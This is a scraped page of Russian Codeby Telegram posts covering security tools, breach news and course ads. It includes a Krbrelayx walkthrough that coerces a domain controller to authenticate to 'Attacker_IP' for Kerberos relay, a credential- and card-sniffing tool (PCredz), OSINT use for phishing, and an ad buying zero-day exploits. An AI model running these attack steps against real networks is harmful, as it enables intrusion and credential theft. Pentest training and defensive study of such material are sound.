codeby_sec | Unsorted

Telegram-канал codeby_sec - Codeby

34787

Крупнейшее ИБ сообщество ру-сегмента Чат: @codeby_one Форум: codeby.net Обучение: codeby.school Пентест: codeby.one CTF: codeby.games VK: vk.com/codeby YT: clck.ru/XG99c Сотрудничество: @KinWiz Номер заявления для регистрации канала в РКН: 5035340278

Subscribe to a channel

Codeby

🦀 Malchela

Модульный набор инструментов для анализа YARA и вредоносного ПО, написанный на Rust. Предназначен для специалистов по цифровой криминалистике, исследователей вредоносного ПО и специалистов по анализу угроз. Он предоставляет как интерфейс командной строки (CLI), так и графический интерфейс пользователя (GUI) для запуска инструментов анализа в единой среде.


🦀 Основные инструменты
🔸Combine YARA - объединяет все файлы .yara/.yar в директории в один файл правил;
🔸Extract Samples - рекурсивно извлекает защищённые паролем архивы с вредоносным ПО (ZIP/RAR), используя распространённые пароли;
🔸File Analyzer - анализирует файл: вычисляет хэши, энтропию, структуру PE, нечёткие хэши, совпадения YARA, проверяет по базе NSRL и статус на VirusTotal;
🔸File Miner - cканирует папку на предмет несоответствия типов файлов и извлекает метаданные;
🔸Hash It - генерирует хэши MD5, SHA1 и SHA256 для одного файла;
🔸Hash Check - проверяет, существует ли указанный хэш в предоставленном файле с набором хэшей;
🔸mStrings - извлекает строки из файла, применяет регулярные выражения и правила Sigma, сопоставляет с MITRE ATT&CK, выявляет индикаторы компрометации (IOC) и включает встроенный поиск техник MITRE;
🔸mzhash - рекурсивно вычисляет MD5-хэши файлов с заголовком MZ;
🔸mzcount - рекурсивно подсчитывает файлы по форматам (MZ, ZIP, PDF и др.) с помощью анализа заголовков/YARA;
🔸nsrlquery - запрашивает MD5-хэш в базе данных NSRL для определения, является ли файл доверенным;
🔸strings_to_yara - запрашивает метаданные и список строк для генерации YARA-правила;
🔸xmzhash - рекурсивно вычисляет хэши файлов, которые не являются MZ, ZIP или PDF.

Для поиска хэша вредоносного ПО требуется ключ API для Virus Total и Malware Bazaar. Если ключ не указан, MalChela предложит вам создать его при первом запуске функции поиска вредоносного ПО.

🔴 Установка
Для установки инструмента для начала потребуется установка зависимостей и rust. Далее клонируем репозиторий и собираем.
sudo apt install openssl libssl-dev clang yara libyara-dev pkg-config build-essential libglib2.0-dev libgtk-3-dev
curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh
git clone https://github.com/dwmetz/MalChela.git
cd MalChela
chmod +x release.sh
./release.sh

❗️Рекомендуется собирать и запускать MalChela в режиме --release, чтобы обеспечить оптимальную работу графического интерфейса и вспомогательных инструментов.

🔧 Добавление пользовательских инструментов
Можно расширить возможности MalChela, отредактировав файл tools.yaml и добавив в графический интерфейс сторонние или пользовательские инструменты. Эта гибкая конфигурация поддерживает двоичные файлы, скрипты на Python и программы на Rust.

В каждой записи указывается название инструмента, категория, тип выполнения, способ передачи входных данных (файл, папка или хэш) и любые необязательные аргументы, например:


#Malchela #DFIR #CyberSecurity

➡️ Все наши каналы 💬Все наши чаты ⚡️ Для связи с менеджером

Читать полностью…

Codeby

🚩 Новые задания на платформе HackerLab!

🌍 Категория ВебХьюстон, у нас течь

Приятного хакинга!

Читать полностью…

Codeby

🎄 НОВОГОДНЯЯ ЛОТЕРЕЯ CODEBY 🎄

Дорогие друзья!

Команда CODEBY поздравляет вас с наступающим Новым годом! Спасибо, что выбираете нас — нам очень приятно видеть, как наши студенты превращаются в специалистов высшего класса.

Именно поэтому мы решили сделать вам новогодние подарки! 🎁

📣ОБЪЯВЛЯЕМ ЛОТЕРЕЮ

Как участвовать:
Купите любой курс, стартующий в 2026 году
• Получите индивидуальный номер участника
Чем больше курсов — тем выше шансы на победу!

Период проведения:
🗓26 декабря 2025 — 12 января 2026
Розыгрыш в прямом эфире 12 января в 21:00 МСК

🏆 ПРИЗОВОЙ ФОНД

🥇 1 место — iPhone 17
🥈 2 место — Apple Watch
🥉 3 место — AirPods
🎁 4-10 места — подписка HackerLab PRO на 1 месяц

Итого: 10 победителей!

🚀Успей принять участие — времени остается все меньше!

➡️ Выбрать курс
🥇 Для связи с менеджером @CodebyAcademyBot

Всем желаем удачи! 🚀

Ознакомиться с условиями розыгрыша здесь!

#онлайнобучение #курсыиб #розыгрыш #кодебай #cybersecurity

Читать полностью…

Codeby

Git-Orbat

Инструмент OSINT для извлечения электронной почты и информации из Github с использованием официального API.

📕Характиристика (что может извлечь утилита):
Email
подписчиков
подписки
Аватар
User ID
Дату создания профиля
Тип профиля
Публичные Git
Локацию(если она указана)
Компанию

💻Установка:

git clone https://github.com/SrJok3s/Git-Orbat.git

cd Git-Orbat


📌Использование:
python3 git-orbat.py


#GitOrbat #OSINT #GitHub #Python #РазведкаДанных

➡️ Все наши каналы 💬Все наши чаты ⚡️ Для связи с менеджером

Читать полностью…

Codeby

OPERATION ZERO - единственная в России платформа по приобретению зиродей-эксплоитов у исследователей для предоставления частным и государственным клиентам наступательных возможностей в киберпространстве. Заказчиками компании являются исключительно организации Российской Федерации и дружественных стран.

OPERATION ZERO сотрудничает с исследователями безопасности, разработчиками и реверс-инженерами по всему миру, соблюдая высочайший уровень конфиденциальности и анонимности. Мы приобретаем зиродей-уязвимости для таких категорий аппаратного и программного обеспечения, как персональные компьютеры, мобильные устройства на базе iOS и Android, браузеры, baseband-процессоры, роутеры, серверы и VPN, гипервизоры, веб-сервисы. Сейчас мы ищем в первую очередь следующие эксплоиты:

— iOS 26 LPE из приложения в ядро — до $500,000
— SolarWinds Serv-U RCE — до $500,000
— Kiteworks MFT RCE — до $500,000
— Titan MFT/SFTP RCE — до $500,000
— Chrome SBX для Android — до $400,000
— PHP / Java RCE для эксплуатации веб-серверов (Apache, Nginx, IIS) — до $400,000
— Windows RCE для первоначального доступа в сеть — до $300,000
— Linux RCE для первоначального доступа в сеть — до $300,000
— Android kernel LPE — до $300,000
— Windows SBX из Untrusted Integrity Level в Medium/SYSTEM — до $200,000
— pfSense RCE — до $200,000
— Chrome heapsbx для Android — до $200,000
— Microsoft Exchange RCE — до $180,000
— MikroTik RCE — до $150,000
— Round Cube RCE — до $150,000
— VNC RCE — до $150,000
— OpenVPN RCE — до $150,000
— Famatech Radmin RCE — до $120,000
— Cisco RCE — до $100,000
— Fortinet FortiGate RCE —до $100,000
— Check Point Firewall RCE — до $100,000
— Juniper Networks RCE — до $100,000
— MacOS RCE/LPE — до $100,000
— Linux LPE (Debian, Ubuntu, CentOS, RHEL, AWS) — до $100,000
— CMS RCE — до $100,000
— Nextcloud RCE — до $70,000
— QNAP RCE — до $70,000

Помимо этого, у нас открыта вакансия для стажёров, готовых обучаться по одному или нескольким направлениям: Windows, Linux, Android, браузеры. Вы будете учиться искать уязвимости и писать для них эксплоиты под руководством профессионалов, причём программа выстроена таким образом, чтобы избежать узкой специализации и уметь исследовать различные системы в зависимости от задач. От вас не требуется какого-либо опыта изучения уязвимостей, но необходимо понимать основы архитектуры x86 и владеть начальными навыками реверс-инжиниринга и программирования на Си и ассемблере.

В блоге на нашем сайте мы пишем обучающие статьи по эксплуатации, а в телеграм-канале публикуем актуальные запросы с ценами, вакансии и прочие новости.

РЕКЛАМА. ООО «МАТРИЦА». ИНН: 78072513O

Читать полностью…

Codeby

WhatsApp* не собирается сдаваться💪

В WhatsApp* отреагировали на ограничения в работе мессенджера в России. Компания считает, что власти РФ хотят лишить людей возможности свободно общаться. Также компания заявила, что мессенджер МАХ, небезопасен - там могут украсть личные данные.

22 декабря, российские пользователи пожаловались на ограничения в работе WhatsApp* — более 3000 жалоб. 23 числа WhatsApp* опубликовала официальное заявление. В нем компания обвинила российские власти в нарушении прав 100 млн пользователей.
"Ограничивая доступ к WhatsApp*, российское правительство стремится лишить более 100 млн человек права на конфиденциальное общение с использованием сквозного шифрования прямо перед новогодними праздниками" — заявили в WhatsApp*.

В начале декабря 2025 года Роскомнадзор начал постепенно ограничивать работу WhatsApp* в России. Тогда в ведомстве объяснили, что площадка используется мошенниками, а сам мессенджер этого не пресекает.
"Мы намерены бороться за наших пользователей, потому что принуждение людей к использованию менее безопасных приложений, одобренных государством, может привести лишь к снижению уровня безопасности для россиян" - заявили в WhatsApp*.

Источник: https://www.gazeta.ru/tech/news/2025/12/23/27482941.shtml
*
*Компания Meta, а также её продукты (WhatsApp) признаны экстремистскими в России

#news #WhatsApp #Russia

➡️ Все наши каналы 💬Все наши чаты ⚡️ Для связи с менеджером

Читать полностью…

Codeby

Очень маленькая и полезная шпаргалка по контролю прав и разрешений в Linux.

➡️ Все наши каналы 💬Все наши чаты ⚡️ Для связи с менеджером

#Linux #Шпаргалка #ПраваLinux

Читать полностью…

Codeby

GhostEyes

GhostEyes — это асинхронный, модульный набор инструментов для наступательной разведки, предназначенный для сетевой и веб-разведки, а также для создания отчетов, предназначенный для специалистов по тестированию на проникновение, красных команд и исследователей.

📕Характеристика:
Сетевая разведка: Сканирование подсети ARP, Обнаружение и выборка VLAN, DHCP-снупинг
Веб-разведка: Брутфорс поддоменов, Брутфорс директорий
Отчеты: Генерация TXT/JSON/HTML/CSV на основе предыдущих сканирований

💻Установка:

git clone https://github.com/6lackRaven/GhostEyes.git

cd GhostEyes


📌Использование:
Сканирование ARP:
python ghosteyes.py net -i <INTERFACE> --scan <IP> --output <JSON-FILE>

Поиск VLAN:
python ghosteyes.py net -i <INTERFACE> --vlan --duration 120

Сканирование поддоменов:
python ghosteyes.py web -u <DOMAIN> -s <WORDLIST> -T


➡️ Все наши каналы 💬Все наши чаты ⚡️ Для связи с менеджером

#GhostEyes #Разведка #Кибербезопасность #RedTeam

Читать полностью…

Codeby

🎄В преддверии Нового года мы подготовили для вас подборку идей подарков для тех, кто увлекается информационной безопасностью.

🎁Среди идей — и наш подарочный сертификат. Это возможность подарить полезные знания и навыки в сфере ИБ. Подробнее об оформлении и формате сертификата.

А какой из них порадовал бы именно вас? Делитесь своими мыслями в комментариях!

➡️ Все наши каналы 💬Все наши чаты ⚡️ Для связи с менеджером

#ИдеиПодарков #Сертификат #ИнформационнаяБезопасность

Читать полностью…

Codeby

SSLyze: Автоматизированный аудит SSL/TLS конфигураций серверов

SSLyze — это быстрый и мощный инструмент для сканирования SSL/TLS, написанный на Python. Он предназначен для автоматизированного анализа конфигураций серверов с целью проверки использования надежных криптографических настроек (сертификатов, наборов шифров) и выявления уязвимостей к известным атакам.


🔤Возможности🔤
- Инструмент оптимизирован для надежного сканирования сотен тысяч серверов ежедневно
- Позволяет встраивать проверки безопасности в процессы непрерывной интеграции и доставки
- Поддерживает сканирование не только HTTP/HTTPS серверов, но и сервисов, использующих SMTP, XMPP, LDAP, POP, IMAP, RDP, Postgres, FTP
- Результаты могут быть сохранены в структурированном JSON-формате для последующего анализа
- Автоматическая проверка конфигурации сервера на соответствие рекомендуемым профилям безопасности (например, от Mozilla)

Установка
sudo apt install sslyze

Проверка
sslyze -h


⏩Базовое сканирование одного хоста
python -m sslyze example.com


⏩Сканирование нескольких целей за один запуск
python -m sslyze example.com google.com:443 192.168.1.10:8443


⏩Сканирование списка целей из файла
Предварительно создайте файл targets.txt, где каждая новая строка содержит адрес хоста (с портом или без):
example.com
api.example.com:443
192.168.1.100:8443

Запустите сканирование
python -m sslyze --targets_in targets.txt


⏩Проверка на соответствие стандарту Mozilla Intermediate
python -m sslyze --mozilla_config=intermediate example.com

Инструмент выведет результат («OK - Supported» или «FAILED - Not supported») и вернет соответствующий код выхода (0 при успехе, не 0 при наличии проблем), что удобно для CI/CD

⏩Расширенная проверка с фокусировкой на конкретные уязвимости
python -m sslyze --heartbleed --robot --certinfo example.com


⏩Сохранение полного отчета о сканировании в JSON-файл
python -m sslyze --json_out=scan_results.json example.com


🔤Важные примечания🔤
- При использовании ключа --targets_in в файле должна быть указана одна цель (hostname или hostname:port) на строку. В командной строке цели перечисляются через пробел
- При использовании ключа --mozilla_config инструмент возвращает код 0, если сервер соответствует выбранному профилю, и код, отличный от 0, если соответствие не достигнуто. Это позволяет легко интегрировать проверку в скрипты автоматизации
- Для проблемных или медленных соединений можно использовать опцию --slow_connection, чтобы уменьшить количество параллельных запросов

➡️ Все наши каналы 💬Все наши чаты ⚡️ Для связи с менеджером

Читать полностью…

Codeby

Очень полезная шпаргалка по GIT, которая поможет вам чувствоваться себя уверенее в окружении.

➡️ Все наши каналы 💬Все наши чаты ⚡️ Чат с менеджером

Читать полностью…

Codeby

WhatsMyName: как найти цифровой след человека за пару кликов 🔍

WhatsMyName — это OSINT-инструмент, который позволяет быстро проверить, на каких онлайн-платформах используется конкретное имя пользователя.
Без взлома. Без магии. Только открытые данные — и плохие привычки пользователей.

Что делает WhatsMyName
Инструмент проверяет сотни сайтов: соцсети, форумы, хостинги кода, сервисы для разработчиков, маркетплейсы и нишевые площадки.
Ты вводишь ник — сервис проверяет, зарегистрирован ли он на известных платформах.
Результат — список ресурсов, где этот username уже занят или существует.
И этого более чем достаточно, чтобы начать раскрутку личности.

Через WhatsMyName можно:
➡️ связать аккаунты человека на разных платформах
➡️ найти старые или забытые профили
➡️ определить интересы, профессию, хобби
➡️ подготовить фишинговую атаку или социальную инженерию
➡️ собрать профиль цели для дальнейшего OSINT

Для пентестера — инструмент.
Для журналиста — источник.
Для сталкера — оружие.
Для обычного пользователя — повод задуматься.

🟧🟧🟧 –20% на два курса по промокоду COMBO20 до 19 декабря!

➡️ Все наши каналы 💬Все наши чаты ⚡️ Чат с менеджером

Читать полностью…

Codeby

🟠Цифровая интимность на витрине. Компрометация PornHub ⚫️

Хакерская группировка ShinyHunters заявила о компрометации данных ≈200 миллионов пользователей Pornhub, сообщает Reuters. Злоумышленники требуют выкуп в биткоинах, угрожая публикацией информации в открытом доступе.

ShinyHunters — одна из самых известных киберпреступных группировок, специализирующихся на кражах и продаже баз данных, вымогательстве и массовых утечках персональных данных. Активны как минимум с 2020 года и за это время стали синонимом крупных data breach-инцидентов. Деятельность данной группировки связывают с утечками данных: Tokopedia, Wattpad, Pixlr, Wishbone, Mathway, HomeChef.


Какие данные скомпрометированы
По подтверждённой информации, в утечке присутствуют:
🟠 email-адреса пользователей
🟠 история просмотров
🟠 поисковые запросы
🟠 ссылки и названия видео
🟠 метаданные пользовательской активности
Это не просто PII, а поведенческие данные, позволяющие точно восстановить цифровой профиль пользователя.

🔸Эксперты считают, что взлом мог произойти не через инфраструктуру Pornhub напрямую, а через сторонний аналитический сервис Mixpanel, с которым платформа сотрудничала до 2021 года.

🔸Pornhub сообщил о расследовании и рекомендовал пользователям сохранять бдительность.
Но в реальности этот инцидент — ещё одно напоминание:
если данные куда-то отправляются — значит, однажды они могут утечь

🟧🟧🟧 –20% на два курса по промокоду COMBO20 до 19 декабря!

➡️ Все наши каналы 💬Все наши чаты ⚡️ Чат с менеджером

Читать полностью…

Codeby

SSLScan: Инструмент для аудита SSL/TLS конфигураций

SSLScan — это утилита командной строки, предназначенная для глубокого анализа конфигурации SSL/TLS на удаленных серверах. Его основная задача — проверка поддерживаемых протоколов, шифров и выявление устаревших или небезопасных настроек путем установки соединений с целевым хостом. В отличие от ручной проверки, SSLScan предоставляет структурированный и полный отчет о состоянии безопасности криптографических протоколов сервера.


💛Возможности
- Анализ всех поддерживаемых сервером шифров для различных версий протоколов (SSLv2, SSLv3, TLS 1.0-1.3)
- Четкое выявление, какие версии SSL и TLS (включая TLS 1.3) активированы на сервере
- Тестирование порядка предпочтения шифров со стороны сервера
- Получение детальной информации о цепочке сертификатов, включая алгоритмы подписи, срок действия, соответствие имени хоста (SNI) и использование расширений, таких как OCSP Must-Staple
- Проверка на наличие известных уязвимостей, включая Heartbleed (CVE-2014-0160), ROBOT, поддержку сжатия TLS (CRIME) и поддержку безопасного возобновления сессии (Secure Renegotiation)
- Возможность сканирования виртуальных хостов, использующих SNI
- Вывод в удобочитаемом виде или в формате XML/JSON для последующего анализа в автоматизированных системах

💛Установка
sudo apt install sslscan
Проверка
sslscan -h

💛Базовое сканирование хоста
sslscan example.com
Эта команда выполнит все основные проверки для домена example.com на стандартном порту 443

💛Сканирование с указанием порта
sslscan example.com:8443
Полезно для проверки нестандартных HTTPS-портов, часто используемых в API или внутренних сервисах

💛Проверка конкретной версии протокола (например, только TLS 1.2 и TLS 1.3)
sslscan --tls13 --tls12 example.com

💛Тестирование всех поддерживаемых шифров без проверки сертификата
sslscan --no-cipher-details --no-renegotiation --no-compression --no-fallback example.com
Опция --no-cipher-details ускоряет сканирование, пропуская детальный анализ каждого шифра

💛Сохранение отчета в формате XML
sslscan --xml=report.xml example.com

💛Недостатки
⁃ Однопоточная архитектура делает полное сканирование всех шифров крайне медленным
- Для полной функциональности требуется статическая сборка с отдельной версией OpenSSL, что увеличивает размер файла и усложняет поддержку
- Базовые форматы отчетов (XML/JSON) требуют дополнительной обработки; отсутствует API для автоматизации

🟧🟧🟧 –20% на два курса по промокоду COMBO20 до 19 декабря!

➡️ Все наши каналы 💬Все наши чаты ⚡️ Чат с менеджером

Читать полностью…

Codeby

Krbrelayx: Инструментарий для исследования и эксплуатации Kerberos в Active Directory

Krbrelayx — это набор инструментов на языке Python, разработанный для демонстрации и проверки уязвимостей, связанных с протоколом Kerberos и службой каталогов Active Directory. Основное внимание уделяется техникам спуфинга и ретрансляции, которые могут позволить злоумышленнику получить несанкционированный доступ или повысить привилегии в корпоративной среде.


🟧Набор Krbrelayx состоит из нескольких инструментов, каждый из которых нацелен на конкретные векторы атаки в инфраструктуре Active Directory:
- Основная функция набора — проведение атак, связанных с ретрансляцией запросов Kerberos, для несанкционированного доступа к сетевым ресурсам
- Инструменты позволяют создавать поддельные службы для перехвата и использования Kerberos-билетов, таких как TGS (Ticket Granting Service)
- Набор демонстрирует эксплуатацию особенностей протокола Kerberos, включая проблемы с проверкой подлинности и делегированием
- Поддержка различных методов указания целей, включая использование файлов и прямых аргументов командной строки

🟧Установка
sudo apt install krbrelayx

Проверяем
krbrelayx -h


🟧Переходим в директорию проекта и устанавливаем зависимости
cd krbrelayx
pip install -r requirements.txt


🟧Атака с использованием утилиты printerbug и ретрансляции
1. Запуск инструмента ретрансляции на машине атакующего
krbrelayx -t ldap://dc02.domain.local # Он будет ожидать входящих соединений Kerberos и ретранслировать их на целевой сервер (например, файловый ресурс)

2. На другой консоли выполняется скрипт printerbug, который принуждает контроллер домена (dc01)
printerbug domain.local/dc01\$@dc01.domain.local Attacker_IP # Аутентифицироваться на указанном IP атакующего (Attacker_IP) под учетной записью компьютера dc01$

В результате хэш пароля учетной записи компьютера dc01$ может быть ретранслирован на сервер dc02, что потенциально позволит создать нового пользователя в домене с высокими привилегиями.

🟧Базовая команда для запуска слушателя и ретрансляции на указанный контроллер домена
krbrelayx -t ldap://dc01.corp.local -wh wpad.corp.local -wa 2


🟧🟧🟧 –20% на два курса по промокоду COMBO20 до 19 декабря!

➡️ Все наши каналы 💬Все наши чаты ⚡️ Чат с менеджером

Читать полностью…

Codeby

Маленькая плашка рассказывающая что такое XSS и какие виды XSS атаки существуют.

#XSS #Picture

➡️ Все наши каналы 💬Все наши чаты ⚡️ Для связи с менеджером

Читать полностью…

Codeby

Баг в браузерном Trust Wallet: как украли более $7 000 000 и что делать пользователям

💰 Хакеры эксплуатировали уязвимость в браузерном расширении Trust Wallet версии 2.68 и украли более $7 000 000 в криптоактивах. Инцидент затронул только расширение 2.68, мобильное приложение и другие версии считаются безопасными.

⁉️ Что случилось
Подтверждён инцидент безопасности именно в версии 2.68 браузерного расширения Trust Wallet (Chrome и совместимые браузеры).
Оценка ущерба по разным источникам — от $6 до более $7 млн, средства массово выводились со скомпрометированных кошельков.

Что делать пользователям
Проверить версию расширения и немедленно отключить/удалить 2.68.
Установить/обновить расширение до версии 2.69 и выше, не используя старую.
Перенести средства с затронутых кошельков в новый кошелёк или в мобильное приложение Trust Wallet.

💬 Ключевые выводы по безопасности
Браузерные кошельки уязвимы к ошибкам обновлений и атакам на цепочку поставки.
Крупные суммы лучше хранить на аппаратных кошельках или в изолированных хранилищах, а расширения использовать только для рабочих балансов.

#взлом #exploit #news #crypto

Все наши каналы 💬Все наши чаты Для связи с менеджером

Читать полностью…

Codeby

🔥ФИНАЛ ГОДА В CODEBY
Пока все подводят итоги — ты можешь апгрейднуть себя

–26% НА ВСЕ КУРСЫ CODEBY

🎁 Промокод: CODEBY2026

До 31 декабря действует итоговая скидка 26% на все курсы Codeby — возможность завершить год с выгодной инвестицией в профессиональные навыки.

🧠 Направления обучения:
пентест, OSINT, SOC, Active Directory, Web Security, DevSecOps и другие практико-ориентированные программы в сфере информационной безопасности.

⚙️ Курсы ориентированы на практику: реальные кейсы, актуальные инструменты и опыт экспертов из индустрии.

Промокод: CODEBY2026
🔣 Скидка: –26%
Действует до: 30.12 включительно

Это последняя возможность в этом году зафиксировать обучение по сниженной цене и войти в 2026 год с актуальными и востребованными навыками.

Выбрать курс ➡️ https://codeby.school/

🥇 Для связи с менеджером @CodebyAcademyBot

Читать полностью…

Codeby

Корейская национальная полиция арестовала четырех хакеров, подозреваемых во взломе более 120 000 IP-камер по всей стране с последующей продажей украденных видеозаписей на зарубежный сайт для взрослых.

IP-камера - это видеокамера, которая подключается к Интернету по протоколу IP, что позволяет пользователям видеть изображение с нее удаленно через смартфон или компьютер. В отличие от традиционных систем видеонаблюдения, которые часто имеют локальный центр наблюдения, такой как компьютер, IP-камеры передают видеопоток в реальном времени на любое устройство, подключенное к сети Интернет.


Каждый из подозреваемых взломал десятки тысяч камер и/или получил доступ к большому объёму видеозаписей с камер ничего не подозревавших пользователей. В заявлении их действия описываются следующим образом:
🔴Подозреваемый 1 (безработный) — взломал 63 000 IP-камер, создал и продал 545 нелегальных видео сексуального характера на сумму 35 миллионов вон ($23 800) в виртуальных активах.
🔴Подозреваемый 2 (офисный работник) — взломал 70 000 IP-камер, создал и продал 648 нелегальных видео сексуального характера на сумму 18 миллионов вон ($12 300) в виртуальных активах.
🔴Подозреваемый 3 (самозанятый) — взломал 15 000 IP-камер и создал нелегальный контент.
🔴Подозреваемый 4 (офисный работник) — взломал 136 IP-камер.

Если сложить количество взломанных камер, то получится больше 120 000. Предположительно, некоторые камеры подвергались взлому несколько раз.

🙈 Следователи отмечают, что на веб-сайт, размещающий незаконный контент, который загружается из разных стран, в прошлом году поступило 62 % всего контента только от подозреваемых 1 и 2.

Трое человек, купивших такой контент на нелегальном сайте, уже арестованы. Им грозит до трёх лет лишения свободы. Полиция сотрудничает с иностранными следователями, чтобы установить личности владельцев сайта и закрыть платформу.

Власти выявили и уведомили 58 пострадавших регионов, призвав пользователей сбросить пароли и сообщив им, как отправлять запросы на удаление контента.

❗️Рекомендации
Пользователям IP-камер следует предпринять следующие вещи:
1️⃣изменить стандартный пароль администратора на надежный и уникальный;
2️⃣отключать удаленный доступ, в случае отсутствия в нем необходимости;
3️⃣устанавливать последние обновления прошивки.

#camera #hackers #news

➡️ Все наши каналы 💬Все наши чаты ⚡️ Для связи с менеджером

Читать полностью…

Codeby

💅 Tracecat — инструмент AI‑автоматизации для SecOps

Tracecat — открытая платформа автоматизации с ИИ для security и IT-команд: позволяет собирать workflows, оркестрировать алерты, вести кейсы и работать с таблицами в одном месте. Данный инструмент можно использовать как лёгкую, расширяемую альтернативу коммерческим SOAR/automation‑решениям.


Основные возможности Tracecat
🛠 Workflows и оркестрация
➡️ No-code UI для визуальной сборки цепочек действий (API-запросы, webhooks, трансформации, AI‑шаги).
➡️ Ветвление, условия, циклы и выражения для работы с данными между шагами.

🔍 AI‑помощь в расследованиях
➡️ Обогащение и суммаризация алертов с помощью LLM, авто‑описания инцидентов.
➡️ Поиск похожих кейсов и рекомендация шагов расследования.

🗓️ Кейсы и таблицы
➡️ Встроенный case management: создание кейсов из workflows, статусы, таймлайн и артефакты.
➡️ Lookup‑таблицы и пользовательские таблицы для списков IP, пользователей и других справочных данных.

⬇️ Установка и запуск
1️⃣ Локально (Docker Compose)
- Клонировать репозиторий и развернуть стек через docker-compose по инструкции из официальной документации.
- После запуска UI доступен локально, где создаётся первый пользователь и рабочее пространство.

2️⃣ Прод на AWS Fargate
- Использовать Terraform‑модуль для развёртывания прод‑стека на AWS Fargate.
- Подходит для команд, которым нужны масштабируемость и интеграция с облачной инфраструктурой.

#tools #ai #soar #automatization

Все наши каналы 💬Все наши чаты Для связи с менеджером

Читать полностью…

Codeby

PCredz — автоматический анализатор трафика для извлечение учетных данных

PCredz — лёгкая, но мощная утилита для извлечения учетных данных, хэшей и другой чувствительной информации из pcap-файлов или живого сетевого трафика. Инструмент активно используют пентестеры, DFIR-аналитики и исследователи сетевой безопасности благодаря удобству, скорости и широкой поддержке протоколов.


⚡️ Основные возможности PCredz
➡️ Многопротокольный анализ
Извлечение данных из IPv4 и IPv6 пакетов сразу по множеству протоколов:
• NTLMv1/v2 (SMB, HTTP, LDAP, MSSQL и др.)
• Kerberos AS-REQ Pre-Auth (etype 23)
• HTTP Basic и формы авторизации
• FTP, POP, SMTP, IMAP
• SNMP community strings
➡️ Поиск кредитных карт в трафике
Определяет и извлекает номера банковских карт, встречающиеся в сетевом потоке.
➡️ Хэши в формате для hashcat
NTLMv1/v2 и Kerberos сохраняются в файлы, которые можно сразу отправлять в hashcat (режимы 5500, 5600, 7500).
➡️ Удобное логирование
Все найденные данные сохраняются в CredentialDump-Session.log и в отдельные файлы (MSKerb.txt, NTLMv1.txt, NTLMv2.txt) в каталоге logs/.

⬇️ Установка и запуск
👩‍💻 Docker
git clone https://github.com/lgandx/PCredz
cd PCredz
docker build . -t pcredz
docker run --net=host -v $(pwd):/opt/Pcredz -it pcredz


👩‍💻 Linux
apt install python3-pip libpcap-dev file
pip3 install Cython python-libpcap


👩‍💻 Использование
⏺️ Разбор pcap-файла
python3 ./Pcredz -f capture.pcap


⏺️ Разбор всех pcap в каталоге
 python3 ./Pcredz -d /tmp/pcaps/ 


⏺️ Живой захват трафика
 python3 ./Pcredz -i eth0 -v 


👩‍💻 Аргументы запуска
-f <file> Парсинг pcap-файла
-d <dir> Рекурсивный разбор каталога
-i <interface> Живой перехват трафика
-v Подробный вывод
-o <dir> Директория для логов

➡️ Все наши каналы 💬Все наши чаты ⚡️ Для связи с менеджером

#PCredz #Kerberos #Pentest

Читать полностью…

Codeby

Многие думают, что безопасность приложений — задача программистов. Но на самом деле первую линию обороны создают пентестеры — «белые хакеры», которые целенаправленно ищут слабые места, пока это не сделали злоумышленники.

Разбираем:
🟧Кто такой пентестер и почему без него не обойтись
🟧Что реально нужно знать и уметь: от сетей и Linux до Python и веб-технологий
🟧С чего начать путь: чек-лист от основ до первых сертификатов
🟧Где бесплатно практиковаться и что положить в портфолио

В статье — готовый маршрут от изучения базовых команд до собеседования на первую позицию.

🟧На форуме вы найдете еще больше актуальной и полезной информации для начинающих и опытных специалистов. Изучайте темы от WAPT и уязвимостей вроде Log4Shell до тестирования AI, атак на умные города и промышленные системы.

🟧Делитесь в комментариях: что кажется вам самым сложным на пути в пентест? Расскажите о своем опыте, первых трудностях или задавайте вопросы🟧

➡️ Все наши каналы 💬Все наши чаты ⚡️ Для связи с менеджером

#снуля #обучение #новичкам #пентест #hackerlab #форум

Читать полностью…

Codeby

🫡 Spotify «взяли на абордаж». Пираты слили в сеть 86 млн треков

Популярный музыкальный сервис Spotify столкнулся с одним из крупнейших пиратских взломов в истории стриминга — хакеры получили доступ почти ко всей библиотеке платформы и выложили в открытый доступ 86 млн аудиотреков общим объёмом более 300 ТБ.

За инцидент взяла ответственность группировка Anna’s Archive, называющая себя «Робин Гудами цифровой эпохи» и заявляющая миссию «сохранения культурного наследия человечества». Они опубликовали ссылки на скачивание всей выгрузки.

По словам взломщиков:
🔼 слиты только самые популярные треки
🔼 на эти 86 млн композиций приходится 99,6% всех прослушиваний Spotify
🔼 оригинальный каталог сервиса — около 256 млн треков

Файлы распространяются через торрент‑раздачи в формате OGG Vorbis 160 Кбит/с. Хакеры подчёркивают, что выбрали «среднее качество» намеренно — чтобы «сохранить музыкальное наследие» в компактном виде. Все треки содержат оригинальные метаданные.

Spotify подтвердил факт взлома и начало расследования.
Однако архив уже доступен в сети, и удалить его теперь невозможно.

Этот инцидент — тревожный сигнал для всей индустрии:
даже крупнейшие стриминговые платформы с мощной DRM‑защитой оказываются уязвимы, когда мотивированные группы находят способ обойти барьеры.

➡️ Все наши каналы 💬Все наши чаты ⚡️ Для связи с менеджером

#Spotify #Взлом #УтечкаДанных #Кибербезопасность #Кибератака

Читать полностью…

Codeby

Как найти слабые места в веб-приложении до того, как их найдут хакеры?

Расскажем на курсе WAPT от Академии Кодебай! 🛡 Это на 100% практический курс по пентесту, где вы попробуете изученные техники взлома в 65-ти заданиях нашей лаборатории!

🔴 Каждую неделю — вебинары с куратором! Старт 22 января. Регистрация здесь.

Содержание курса:
✦ эксплуатация всех актуальных типов уязвимостей, активный / пассивный фаззинг
✦ SQL Injection и CMD Injection, Cross Site Scripting, PHP injection, Server Side Template injection
✦ техники повышения привилегий, Client-side атаки (XSS, CSRF)

Получите практические навыки как в рабочих задачах, так и в Bug Bounty. 🚀 По всем вопросам пишите @CodebyAcademyBot

Читать полностью…

Codeby

🎄 Сегодня стартовал новогодний CTF от HackerLab × «Хакер»!

С 21 декабря в нашем боте каждый день будет появляться новая задача дня.
🧩 Решай задания → 🗝 собирай ключи → 🎁 участвуй в розыгрыше призов.

🕛 Первое задание уже доступно в боте!

➡️ Заходи в бота и решай задачи: @HLxXakepBot

Читать полностью…

Codeby

🚩 Новые задания на платформе HackerLab!

⚙️ Категория Реверс-инжинирингВишнёвая семёрка

🧰 Категория PWNГовори — и будет исполнено
——————————————

🗂 В архив добавлены задания Киберколизея IV

Приятного хакинга!

Читать полностью…

Codeby

CloakQuest3r

